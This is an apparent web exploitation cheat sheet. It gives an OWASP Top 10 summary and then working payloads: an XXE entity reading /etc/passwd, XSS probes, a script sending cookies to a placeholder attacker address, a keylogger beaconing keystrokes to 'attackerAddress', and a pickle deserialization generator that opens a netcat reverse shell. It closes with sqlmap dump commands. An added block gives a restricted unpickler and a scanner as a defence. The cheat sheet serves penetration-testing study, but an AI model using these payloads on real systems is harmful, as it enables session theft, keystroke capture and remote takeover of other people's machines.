Web exploitation cannot happen without an intercepting proxy and advanced tools such as:

  • Burp Suite
    • Not open-source but offers a free community edition [Link].
  • OpenVAS
    • Free and open-source [Link].

It is fundamental to master all OWASP TOP 10 vulnerabilities:

  • A01:2021 – Broken Access Control
    • Incorrectly implemented authentication and session management calls.
  • A02:2021 – Cryptographic Failures
    • Failure to protect data in transit and at rest. Examples: plain-text passwords, not using SSL…
  • A03:2021 – Injection
    • Untrusted input inserted (or injected) into a query or command so that it is interpreted as if it were part of the program's code.
  • A04:2021 – Insecure Design
    • Missing or ineffective control in the design of the application.
  • A05:2021 – Security Misconfiguration
    • Misconfigured access controls such as default credentials or empty passwords.
  • A06:2021 – Vulnerable and Outdated Components
    • Software that is vulnerable, unsupported, or out of date, including the OS, dependencies…
  • A07:2021 – Identification and Authentication Failures
    • Failure to confirm the user's identity, or weak authentication and session management.
  • A08:2021 – Software and Data Integrity Failures
    • Data integrity issues related to code or infrastructure. Violations caused by libraries from untrusted sources, CDNs…
  • A09:2021 – Security Logging and Monitoring Failures
    • Failure to detect, escalate, and respond to active breaches.
  • A10:2021 – Server-Side Request Forgery (SSRF)
    • Occurs whenever a web application fetches a remote resource without validating the user-supplied URL.

PAYLOADS

  • XXE (XML eXternal Entity attack)
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY read SYSTEM 'file:///etc/passwd'>]>
<root>&read;</root>
  • XSS (possible in JavaScript, VBScript, Flash, and CSS)

Main categories of attacks:

  • Reflected XSS – A link that contains a script embedded within it that executes when visited.
  • Stored XSS – Implants a persistent script in the target website (usually in the database) which will execute when anyone loads the content.
  • DOM Based XSS – No HTTP request is required. It is injected by modifying the DOM of the target site on the client side (browser).

It is worth mentioning the popular sources of payloads: PayLoadBox [Link], XSS-Payloads [Link].

Quick tests for low-hanging fruit:

<script>alert(1)</script>
<image src="javascript:alert(1)">
<body oninput=javascript:alert(1)><input autofocus>
<img \x00src=x onerror="alert(1)">

A payload for stealing Cookies:

<script>document.location='http://ip:port/?='+document.cookie;</script>

A very simple key logger:

<script>
var keys='';
document.onkeypress = function(e) {
  get = window.event?event:e;
  key = get.keyCode?get.keyCode:get.charCode;
  key = String.fromCharCode(key);
  keys+=key;
}
window.setInterval(function(){
  new Image().src = 'https://attackerAddress/kl.php?c='+keys;
  keys = '';
}, 1000);
</script>
  • Insecure DeSerialization (the output of the following script is the payload)
import pickle
import sys
import base64
command = 'rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | ' '/bin/sh -i 2>&1 | netcat 10.10.10.10 4444 > /tmp/f'
class rce(object):
    def __reduce__(self):
        import os
        return (os.system,(command,))
print(base64.b64encode(pickle.dumps(rce())))
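As an added defensive counterpart (example code, not from the original post): a restricted unpickler that refuses the global this payload depends on, plus an opcode scan with pickletools that flags such a pickle without loading it. The allow-list, class and function names are my own, and the demo payload is a constructed stand-in with a harmless command.

```python
import io
import os
import pickle
import pickletools

# Allow-list of globals a pickle may reference (assumed, application-specific
# policy). Anything else is refused, so os.system (really posix.system) never runs.
ALLOWED_GLOBALS = {("builtins", "set"), ("builtins", "frozenset"),
                   ("collections", "OrderedDict")}

class RestrictedUnpickler(pickle.Unpickler):
    """Resolve GLOBAL / STACK_GLOBAL references only from ALLOWED_GLOBALS."""
    def find_class(self, module, name):
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"forbidden global {module}.{name}")

def load_or_reject(data):
    """Return ('ok', obj) or ('rejected', reason); a payload is never executed."""
    try:
        return ("ok", RestrictedUnpickler(io.BytesIO(data)).load())
    except pickle.UnpicklingError as exc:
        return ("rejected", str(exc))

_STRING_OPS = {"SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE",
               "STRING", "SHORT_BINSTRING", "BINSTRING"}

def referenced_globals(data):
    """Triage scanner: list the (module, name) pairs a pickle references by
    walking its opcodes instead of executing them. STACK_GLOBAL operands are taken
    from the last two string constants seen; memo-reused strings (BINGET) are not
    followed, so this is a detection aid, while RestrictedUnpickler enforces."""
    found, strings = [], []
    for op, arg, _pos in pickletools.genops(data):
        if op.name == "GLOBAL":                      # protocols 0-3: "module name"
            found.append(tuple(arg.split(" ", 1)))
        elif op.name in _STRING_OPS:
            strings.append(arg)
        elif op.name == "STACK_GLOBAL" and len(strings) >= 2:
            found.append((strings[-2], strings[-1]))
    return found

class _DemoReduce:
    """Constructed stand-in for the page's rce class, with a harmless command."""
    def __reduce__(self):
        return (os.system, ("true",))

def demo_payload():
    return pickle.dumps(_DemoReduce())   # never passed to plain pickle.loads

def safe_payload():
    return pickle.dumps({"user": "alice", "roles": ["admin"]})
```

Running `referenced_globals(demo_payload())` shows the `system` global before anything is deserialized, and `load_or_reject` returns `("rejected", ...)` for it while the plain dict loads normally.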

INJECTION

  • SQLmap – SQL injection and database takeover [Link]:
sqlmap -r requestFile
sqlmap -r requestFile --dump

Note: requestFile contains the raw HTTP request that SQLmap uses as the template for its injection attempts.

See more usage and examples of SQLmap on the other post [Link].